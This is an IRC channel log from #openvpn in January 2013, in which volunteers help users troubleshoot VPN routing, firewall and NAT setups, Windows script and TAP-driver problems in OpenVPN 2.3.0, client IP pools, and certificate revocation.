16:43 <+pekster> hilo: No clue then. htop shows the 'openvpn' user when I use --user openvpn --group openvpn in my config file (or via CLI) both through my distro's initscript and when I do openvpn --config file.conf on the command-line
16:44 <+pekster> Are you sure it's the right ovpn process if you have more than one?
16:44 < hilo> pekster, there is only one
16:45 < hilo> pekster, I have to run... I'll be back in an hour (commuting home)
16:46 -!- hilo [~helo@38.98.103.201] has quit [Quit: Leaving]
16:57 -!- sjuxax [~jeff@unaffiliated/sjuxax] has joined #openvpn
16:58 -!- jthunder [~jthunder@184.151.222.11] has joined #openvpn
16:59 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
17:01 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
17:01 < sjuxax> Hello. I have a VPN connection that seems to be working well, but I am unable to resolve a route to the VPN server's external IP address while connected. The internal IP address works fine. For instance, I can connect to an address like 10.10.10.1, the VPN server, but I can't connect to 67.45.25.xxx, the public IP of the same server. Here is my local routing table: http://dpaste.com/888218/
17:07 <+pekster> sjuxax: That can't be true, because your kernel is consulting the routing table for every encrypted packet it sends to your VPN peer
17:07 <+pekster> If it were true, your VPN would stop working as soon as you connected with a 'redirect-gateway' style setup like you have
17:08 < sjuxax> pekster: yeah, it seems only to happen on port 25
17:08 < sjuxax> i forgot to include that part :]. Will paste in one sec.
17:09 <+pekster> Okay, then it's not a problem looking up the route. Sounds like a firewall, and it's common for ISPs to do blocking on tcp/25 due to SMTP abuse potential. It's less common to block something bound *for* tcp/25, but some ISPs require you to use their SMTP servers if you do
17:10 <+hazardous> in the US or out?
17:10 <+hazardous> from what I can tell several US ISPs block outbound 25
17:10 <+hazardous> and require you to use their smarthost to pass mail out
17:10 <+hazardous> actually a lot*
17:10 <+hazardous> seems to be less common outside the states though
17:10 < sjuxax> http://dpaste.com/888222/
17:11 <+pekster> You have a firewall problem. OpenVPN can't really help you with that
17:11 < sjuxax> Shouldn't the ISP not even know what port I'm connecting on, since the connection is going on the VPN?
17:11 <+pekster> No, because that traffic isn't sent across the VPN
17:11 <+pekster> You need a route to send the encrypted packets to the host that's not over the VPN
17:11 <+pekster> ie: you can't send encrypted VPN packets across the VPN. Where would that packet go? Over the VPN? And where would that one go...
17:12 < sjuxax> Ah, traffic to the outside IP is being sent over the plaintext because the routing table says to do that so the VPN can eat the other packets. Correct?
17:12 <+pekster> Right
17:12 < sjuxax> Hmm, so is there an easy way to say "do that for everything except port VPN PORT?"
17:12 <+pekster> Don't communicate with that host, or write creative policy routing rules to send anything that's not the ovpn traffic (based on IP/port tuple) across the VPN anyway
17:12 <+pekster> sjuxax: That depends on what you mean by "easy"
17:13 <+pekster> It's not too hard if you're familiar with policy routing
17:13 <+pekster> If you're not, start here (for Linux) http://lartc.org/howto/
17:13 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org)
17:13 <+pekster> You'll then need to manage that part of the routing table adjustment yourself instead of letting openvpn do it
17:14 < sjuxax> OK. I will probably just put the vpn on a separate host. Thanks for all the help guys :)
17:14 <+pekster> Chapter 4 of that howto is where the policy routing stuff is explained, but you'd better start at the beginning if you're new to advanced iproute2 functionality
17:28 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
17:37 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
17:47 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 255 seconds]
17:48 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
17:50 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn
18:01 -!- jthunder [~jthunder@184.151.222.11] has quit [Ping timeout: 248 seconds]
18:05 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 255 seconds]
18:09 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
18:10 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has joined #openvpn
18:25 -!- sjuxax [~jeff@unaffiliated/sjuxax] has quit [Ping timeout: 255 seconds]
18:26 -!- sjuxax [~jeff@unaffiliated/sjuxax] has joined #openvpn
18:28 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn
18:31 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
18:41 -!- sjuxax [~jeff@unaffiliated/sjuxax] has quit [Quit: Leaving.]
18:43 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
18:43 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection]
18:49 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
18:57 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
19:13 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 248 seconds]
19:37 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
19:49 -!- raidz is now known as raidz_away
19:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
19:59 -!- p3rror [~mezgani@2001:0:53aa:64c:383b:48a0:d673:605d] has joined #openvpn
20:20 -!- p3rror [~mezgani@2001:0:53aa:64c:383b:48a0:d673:605d] has quit [Ping timeout: 245 seconds]
20:24 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn
20:25 < xbskid> I have a site-to-site VPN set up; I can connect fine, but I think I'm missing either some routing or firewall rules. I can ping and traceroute successfully from the client network to the server-side network, but not the other way around.
20:26 < xbskid> Performing a traceroute from the server-side network reaches the server, but goes no further.
20:26 < xbskid> Could I need an iptables route to forward traffic to the tunnel?
20:37 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn
20:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
20:44 <+pekster> xbskid: Sounds like a firewall issue since getting an ICMP ping back means your return routing is working, as is the firewall for the reply
20:46 <+pekster> xbskid: Try a tcpdump/wireshark trace each step of the way, making sure to follow the path across each interface on your VPN peers
20:48 < xbskid> I would, but I neither have those tools nor know how to use them, not to mention I'm using Tomato routers as endpoints; I imagine it would be a pain in the ass to install them.
20:48 <+pekster> You can do a poor-man's tcpdump with targetless iptables rules
20:49 < xbskid> I'll try that.
21:25 -!- hilo [~saori@cpe-68-173-145-155.nyc.res.rr.com] has joined #openvpn
21:53 -!- hilo [~saori@cpe-68-173-145-155.nyc.res.rr.com] has quit [Quit: Leaving]
21:57 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn
21:58 < pyro254750> having trouble getting internet access when connected to openvpn, any obvious problems that normally cause this?
22:10 <+pekster> pyro254750: Plenty, most of which boil down to a misconfiguration of the openvpn config or your routing/firewall setup
22:10 <+pekster> Perhaps this is of use:
22:10 <+pekster> !rediret
22:10 <+pekster> !redirect
22:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
22:10 <@vpnHelper> http://ircpimps.org/redirect.png
22:12 < pyro254750> how would I check to verify that the routing is set up correctly. I followed the standard linode setup guide, I'm able to connect remotely but no internet access on client pc
22:12 <+pekster> You'd follow the steps in the flowchart you were just linked
22:13 < pyro254750> sorry, was having trouble getting it open, I see that now
22:14 < pyro254750> I assume that these steps are followed while connected to the vpn?
22:20 <+pekster> Yea, besides the basic configuration items
22:22 < pyro254750> for all the items on the flowchart like "is redirect-gateway enabled" is there a command I can run to tell me if it's operating, or is it simply asking if it's enabled in conf files
22:24 <+pekster> It should be obvious if you increase the verbosity to 'verb 4' and check the log output what the server is or is not pushing
22:24 <+pekster> Try the manpage and read about that option if you're unclear on what it does
22:24 <+pekster> Also:
22:24 <+pekster> !provider
22:24 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
22:25 <+pekster> It's impossible to know if your provider has properly enabled ip forwarding and NAT where required, for instance
22:30 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Quit: Leaving]
22:30 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn
22:34 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
22:43 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer]
22:51 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Quit: Leaving]
23:01 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit [Read error: Connection reset by peer]
23:02 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn
23:03 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has quit [Client Quit]
23:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:38 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn
23:39 < DrCode> hi all
--- Day changed Wed Jan 23 2013
00:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
00:56 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds]
01:12 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn []
01:19 -!- bmanatwork [~work@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn
01:48 < bmanatwork> anyone help me with some iptables rules, i want 10.10.10.0(tun) to access anything, atm i have it able to access the internal networking and external ip of the server by pushing the routes manually
01:56 <+pekster> bmanatwork: Your question lacks enough information to suggest anything. Is this device generating its own traffic or forwarding routed traffic? What is the context of the traffic flowing across the interface? And network context. Etc.
01:56 <+pekster> You're not going to get good answers if you don't ask good questions
01:56 < bmanatwork> yeah i'm working on pastebinning my stuff
01:57 < bmanatwork> i'm just slow, very sorry
02:00 < bmanatwork> http://a8.lc/bin/6ib29
02:00 <@vpnHelper> Title: Administr8 Pastebin! » 6ib29 (at a8.lc)
02:00 < bmanatwork> pekster: there is my openvpn and iptables config
02:00 < bmanatwork> sorry i was slow about it
02:01 < bmanatwork> i am wanting a client connecting to this openvpn server to be able to access that server as well as other hosts on the network it's connected to (internet)
02:02 < bmanatwork> so there is a secure connection to this server for internal docs, but they can still browse the internet as normal
02:02 < bmanatwork> is that a good explanation pekster
02:02 < bmanatwork> i've been trying for weeks, but i'm not getting what i want
02:03 < bmanatwork> got closer tonight by adding a dns server, i can resolve ip's but still can't route
02:04 < bmanatwork> when i traceroute i get to the openvpn server 10.10.10.1 but it doesn't get to the next hop
02:04 < bmanatwork> so i think it's in my iptables rules but i don't know why
02:05 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
02:05 < bmanatwork> from my iptables output it looks like i am accepting all from 10.10.10.0 to anywhere
02:06 < bmanatwork> did you think you could help?
02:09 <+pekster> bmanatwork: You want 2 things then; pick one at a time to get working. We have some info from our bot, including handy flowcharts for each:
02:09 <+pekster> !serverlan
02:09 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
02:09 <+pekster> Then, for the redirection:
02:09 <+pekster> !redirect
02:09 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
02:09 <@vpnHelper> http://ircpimps.org/redirect.png
02:10 < bmanatwork> i have grep ipv4.ip_forward /etc/sysctl.conf
02:10 < bmanatwork> net.ipv4.ip_forward=1
02:10 < bmanatwork> so that covers 1?
02:11 <+pekster> Yup
02:11 < bmanatwork> i have a local dns server
02:12 < bmanatwork> and def1 in my config push "redirect-gateway def1"
02:12 -!- ade_b [~Ade@109.58.202.10.bredband.tre.se] has joined #openvpn
02:12 -!- ade_b [~Ade@109.58.202.10.bredband.tre.se] has quit [Changing host]
02:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:12 < bmanatwork> so am i missing something still
02:12 < bmanatwork> i'm sorry i'm not familiar with this, i have had this working for a while for secure connections
02:12 < bmanatwork> but my boss wants to browse the internet too
02:13 < bmanatwork> !def1
02:13 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
02:14 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
02:19 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn
02:20 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Read error: Connection reset by peer]
02:20 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn
02:24 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Ping timeout: 246 seconds]
02:31 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has joined #openvpn
02:39 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn
02:42 -!- Minnebo [~Minnebo@mail.mms-secure.eu] has quit [Ping timeout: 248 seconds]
02:42 -!- mementomori [~mementomo@unaffiliated/mementomori] has joined #openvpn
02:42 < mementomori> hi
02:43 < mementomori> I'm using openvpn 2.3.0 on windows xp and it seems like the 'route-up' script is not called
02:44 < EugeneKay> !windows
02:44 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny
02:45 < mementomori> EugeneKay, the links are both 404
02:45 < mementomori> :)
02:45 < EugeneKay> Yeah, ecrist's fault.
02:46 < EugeneKay> !pastebin your configs ?
02:46 < EugeneKay> !pastebin
02:46 <@vpnHelper> "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
02:46 < EugeneKay> Damn bot.
02:46 < mementomori> EugeneKay, sure, gimme a second
02:46 < EugeneKay> The windows box, really.
02:48 < mementomori> pastebin.com/encUnnJS 02:49 < EugeneKay> I suspect it's something with the \\ escaping myself 02:49 < EugeneKay> It's always escapign 02:50 < EugeneKay> Try invoking with relative paths and the --cd directive on the command line 02:50 < mementomori> EugeneKay, but log doesn't put any warning about route-up line 02:50 < mementomori> EugeneKay, I'll try with single \ 02:51 < mementomori> EugeneKay, ok. trying --cd 02:53 -!- bmanatwork [~work@cpe-70-112-107-27.austin.res.rr.com] has left #openvpn ["Leaving"] 02:54 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 248 seconds] 03:02 < mementomori> mmmm --cd, single \ and using / instead of \\ haven's solved the problem 03:04 < mementomori> I tried route-up c:/Programmi/OpenVPN/config/infotel-ts/route-upXXX.bat and it complains the file doesn't exist 03:04 <+pekster> mementomori: So --cd "C:\Some\where" --route-up "C:/Some/where/script.bat" ? 03:04 < mementomori> pekster, yes 03:04 < mementomori> so I think the problem is in the .bat 03:04 -!- AsadH is now known as zz_AsadH 03:05 <+pekster> Quoted or not? I'm curious as I didn't get a sample route-up script to work in either 2.2.2 or 2.3.0-x64 bit. Interesitngly enough, the 'verb 4' is ignored in 2.3.0 as well 03:05 <+pekster> Downgrading to 2.2.2 and the exact same config verb 4 works fine 03:05 <+pekster> :\ 03:05 -!- Orbi [~opera@109.129.12.35] has joined #openvpn 03:06 < mementomori> pekster, it was working with and older release 03:06 < mementomori> pekster, but I dont remember which version it actually was 03:07 <+pekster> k. So now you're using --route-up with or without outside-quotes? 03:07 < mementomori> www.pastebin.com/X4E6AAUZ 03:07 < mementomori> pekster, now without quotes 03:08 <+pekster> Interesting. 
I should gander at the code since I've seen some quoting issues due to Windows pathnames in the past too 03:08 <+pekster> Windows is such a PITA ;) 03:08 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:08 < mementomori> pekster, but it cannot be a quoting problem becouse it is able to detect missing files. 03:09 <+pekster> They shouldn't have been missing though, right? openvpn is "supposed" to support Windows-style paths as parameters too 03:09 <+pekster> You usually have to escape spaces in names (via quotes or escapes) and also escape backslashes 03:09 -!- Orbi [~opera@109.129.12.35] has quit [Ping timeout: 248 seconds] 03:10 <+pekster> For example, here's a (working) cd directive that's valid in 2.2.2 and 2.3.0: cd "D:\\Apps\\OpenVPN\\config\\auth-client" 03:10 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Ping timeout: 244 seconds] 03:11 < mementomori> pekster, I'll try again 03:11 <+pekster> If you use cd, you should also be able to use a relaative name to your script 03:11 < mementomori> with all the \\ and / and quote combinations 03:12 <+pekster> So if 'foo.bat' is in the same folder you --cd to, it should work to do '--route-up foo.bat' 03:12 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 03:12 < mementomori> pekster, in older releases everything was relative to %ProgramFiles%\OpenVPN\config by default 03:13 < mementomori> and this is good because you can't actually know where %programfiles% is 03:14 <+pekster> My guess is that was only true if the GUI started it. Normally it doesn't do any dir changes, so if you start in c:\somewhere it'll root there unless changed 03:14 < mementomori> and you cant access %programfiles% from .bat launched by openvpn 03:14 <+pekster> Sure you can (unless you mean UAC limitations. That's not ovpn's problem at that point) 03:14 < mementomori> pekster, yes. 
you could be right sing I'm using the gui 03:14 < mementomori> s/sing/since 03:18 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn 03:20 < djc> so I have topology subnet setup with a simple 255.255.255.0 subnet; now, I'd like some clients to have a stable IP, so I have ccd files for those 03:20 < mementomori> no way. I'll try downgrading 03:20 <+pekster> djc: The IP a client gets does not change the CN it uses, which is what your ccd files are named after 03:20 < djc> however, I was counting on the other clients to not get any of those stable-designated IP's, but yesterday some of those IP's got assigned to our new Android clients 03:21 < djc> pekster: right, I get that 03:21 <+pekster> djc: Oh, okay, so you want some statically addressed (via ccd entries) vs dynamic clients. Then lower your --ifconfig-pool range 03:21 <+pekster> Don't assign a dynamic range to overlap IPs you manage external to the pool or you'll get unexpected surprises like that 03:23 < djc> pekster: so currently I just use a server option, no ifconfig-pool 03:23 <+pekster> Expand that helper-directive yourself 03:23 < djc> yeah 03:23 * pekster hates helper directives for that reason 03:24 <+pekster> You can't just issue --ifconfig-pool (I did test that a couple of weeks back actually) as it's invalid to do that 03:24 <+pekster> not after you use a --server* option 03:25 < djc> ok, but so the routing will still work out to clients that are not in the ifconfig-pool? 03:25 < djc> that's always what I found slightly confusing 03:25 <+pekster> Yea, of course. Any 'push "route ..."' statements, plus any kernel-level routing doesn't change 03:26 <+pekster> Just the IP. --ifconfig-pool manages the --ifconfig-push stuff automatically behind the scenes so you don't need ccd or --client-connect scripts for every client 03:26 < djc> but server doesn't imply any "route" statements, only route-gateway 03:26 <+pekster> In subnet? 
Then that's fine 03:26 < djc> hmm, okay, let's test this 03:27 <+pekster> If your setup currently works and you just need to reduce your pool, expand the --server directive as the manpage shows, then reduce your --ifconfig-pool to a sane value 03:27 <+pekster> That's it. The ccd stuff works as it does now 03:31 < djc> pekster: awesome, thanks for your help 03:34 < mementomori> ok. downgrading to latest 2.2 solved my problem 03:34 < mementomori> should I file a bug report? 03:35 <+pekster> You're getting 'file not found' on a path for your --route-up script that works in 2.2.2? 03:35 <+pekster> Or does it not execute the script at all? 03:36 < mementomori> pekster, the script isn't executed 03:36 <+pekster> Sounds like a 2.3.0 bug then 03:37 < mementomori> pekster, but 2.3.0 correctly checks if the file exists 03:37 < mementomori> pekster, it "just" forgets to call it :) 03:41 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 03:54 -!- master_of_master [~master_of@p57B53EFA.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 03:59 -!- zz_AsadH is now known as AsadH 04:03 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:16 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 04:23 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 04:35 < holmen> pekster: i've PM:ed you :) 04:36 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 04:38 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 04:46 -!- p3rror [~mezgani@2001:0:53aa:64c:14e8:5090:d607:374c] has joined #openvpn 04:50 -!- master_of_master [~master_of@p57B5402B.dip.t-dialin.net] has joined #openvpn 05:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:01 < Rienzilla> 13 05:02 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 05:02 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn [] 05:03 -!- zrzerenato 
[~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn 05:03 -!- dazo_afk is now known as dazo 05:04 < zrzerenato> hi 2 all, I'm having a simple issue and googling is not helping so much, can someone please ? 05:08 < zrzerenato> I am connecting normally with all ovpn clients, but duty's notes, they are not administrator users at local computer (windows 7), but I already set privileges for those users, and I even found these (route-method exe route-delay 2), for setting client .conf file 05:08 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 05:09 < zrzerenato> I can connect but with the following error FlushIpNetTable failed on interface Access Denied 05:10 -!- MariusIT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 05:11 < zrzerenato> anyone? 05:12 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 05:21 <+pekster> zrzerenato: http://www.openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin 05:21 <@vpnHelper> Title: HowTo Run OpenVPN as a non-admin user in Windows (at www.openvpn.se) 05:21 <+pekster> zrzerenato: Your error is pretty self-explanatory; the running user lacks the ability to perform an operation on the network interface 05:25 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 05:25 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 05:26 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 
05:27 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 05:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 05:29 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 05:38 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 05:38 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 05:42 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn 05:42 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 244 seconds] 05:44 < zrzerenato> pekster thanks, I'll try that and let you know!! 05:59 < zrzerenato> pekster: HKEY_LOCAL_MACHINE\SOFTWARE\OpenVPN-GUI\allow_service there is no key on my registry editor 06:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 06:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:15 -!- valparaiso_ [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has joined #openvpn 06:17 -!- valparaiso_ is now known as valparaiso 06:18 < BtbN> How do I make my openvpn server forward ipv6? It successfully pushes the ipv6 subnet route, and the client also gets to the first hop, but nothing after it. 
06:19 < BtbN> I enabled the ipv6 version of ip_forward 06:19 < BtbN> I think it's the responses that don't get through 06:40 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 06:46 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 06:48 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 06:50 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has left #openvpn [] 06:58 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has joined #openvpn 06:58 <@ecrist> what's my fault? 07:00 < gedO> Hello, who can help me with interfaces? 07:00 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 252 seconds] 07:01 <@ecrist> !ask 07:01 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 07:01 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:02 < gedO> Okey, OpenVPN created only one tap interface. I need more. How can I create more? 07:02 < gedO> ecrist: Do you know? 07:03 <@ecrist> there's a batch script included, don't remember where it gets installed, but I think c:\program files\openvpn called tuntap.bat or somesuch 07:03 < gedO> ecrist: okey, I will check :) 07:08 < gedO> ecrist: I can't find that script 07:08 <@ecrist> it's there, somewhere 07:09 <@ecrist> let me see if I can figure out where it is 07:09 < kisom> gedO, ecrist: I don't have it either on 2.3.0. It used to be under the bin folder if I recall correctly. 07:10 < gedO> kisom: Do you have this problem too? 07:10 <@ecrist> C:\Program Files\OpenVPN\bin\tapinstall.exe 07:10 <@ecrist> does not exist? 07:10 < kisom> Not on 2.3 .) 07:11 < gedO> ecrist: nope 07:11 <@ecrist> try searching your entire system 07:11 < kisom> One sec, let me try something. 
07:11 <@ecrist> I'll look into it from my end 07:11 < kisom> Check in C:\Program Files\TAP-Windows\bin 07:12 < kisom> Seems they've split up openvpn and the TAP driver in 2.3 07:12 <@ecrist> similar to how they stripped easy-rsa out of core 07:12 < gedO> kisom: I have that directory 07:13 < gedO> kisom: What is next to create tap? 07:13 <@ecrist> do you have tapinstall.exe? 07:13 < kisom> Execute "devcon.exe help" 07:13 < kisom> there's lots of info in there 07:14 < gedO> kisom: Okey 07:14 < gedO> kisom: Looking right now :) 07:15 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:16 < kisom> Anyways, I need to mirror my drive and send it back to seagate for a replacement. Hence I'll be off for a few hours. Cya. 07:23 < BtbN> Hm, I just can't figure out what's wrong. I even can't ping my network from the openvpn server, as it tries to issue the ping from the openvpn interface 07:23 < BtbN> which shouldn't be a problem, but it is 07:34 <+pekster> ecrist, gedO, you need to manually run the 'tap-windows.exe' installer 07:35 <+pekster> Whoever built the 2.3.0 (including rc builds) didn't use the right version of the nsis script, so those don't get installed by default 07:35 <@ecrist> that'd be mattock 07:35 <+pekster> Have an email? 07:35 < gedO> pekster: Yes, I know. I have found a solution 07:35 <@ecrist> pekster: if you know what's wrong, can you please post to the -devel mailing list, or in the -devel IRC channel? 07:36 <+pekster> ecrist: Sure thing. I just discovered the exact issue a day or two ago and I simply lost track of it (gotta put a postit or something.) 07:36 <+pekster> I'll get to it once I have some coffee this morning I guess 07:37 < gedO> pekster: http://pastebin.com/96qBm918 here is a script to add one TAP 07:37 < khem_> I've had several attempts now to revoke a cert to exclude a user from my OpenVPN server without success. The output from OpenSSL looks all good: http://pastie.org/5834385. Anyone knows what's wrong? 
07:37 <+pekster> gedO: Yea. You can swipe the scripts from an older version, but they're "supposed" to be installed 07:38 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 07:38 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 07:38 <+pekster> gedO: For now, if you open the openvpn-install*.exe file with 7-zip, go to .\$TEMP\ and grab tap-windows.exe, reinstall that, and select the optional "utilities" you get it in your TAP-Win32 program files folder 07:38 * pekster goes to get that email sent off before the day gets more complicated 07:39 <@ecrist> khem_: is your CRL included in your openvpn config file? 07:39 <@ecrist> and is the CRL your openvpn instance references up to date? 07:39 < khem_> ecrist: included with crl-verify, yes. 07:39 < gedO> pekster: okey 07:39 <@ecrist> khem_: is it up to date? 07:39 < khem_> I'm not sure what you meant about the last part - instance references? 07:40 <@ecrist> the file referenced by crl-verify needs to be up to date 07:40 <@ecrist> the revocation is only stored in the CRL, not in the cert, so if Openvpn is using an old CRL, it won't know about the newly-revoked certificate 07:41 < khem_> ecrist: oh, the .crl-verify file was updated just minutes ago according to the filesystem, and is the same file that I queried with OpenSSL and gives status of 2 revoked certs. 07:41 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 256 seconds] 07:41 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 07:41 <@ecrist> are you sure you revoked the correct certificate, then? 
